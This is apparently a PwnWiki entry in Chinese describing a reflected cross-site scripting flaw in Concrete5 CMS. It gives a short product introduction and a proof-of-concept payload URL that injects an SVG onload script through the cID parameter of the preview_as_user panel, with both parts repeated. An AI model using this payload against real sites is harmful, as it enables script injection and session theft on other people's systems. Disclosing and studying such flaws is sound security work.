Concrete5 CMS XSS漏洞
From PwnWiki
簡介
Concrete5是一個免費的CMS系統,可以創建網站,並以其易用性而聞名。使用Concrete5的主要組織包括GlobalSign、美國陸軍、REC和BASF等。
Payload
http://xxx/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert(1)>
Concrete5是一個免費的CMS系統,可以創建網站,並以其易用性而聞名。使用Concrete5的主要組織包括GlobalSign、美國陸軍、REC和BASF等。
http://xxx/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert(1)>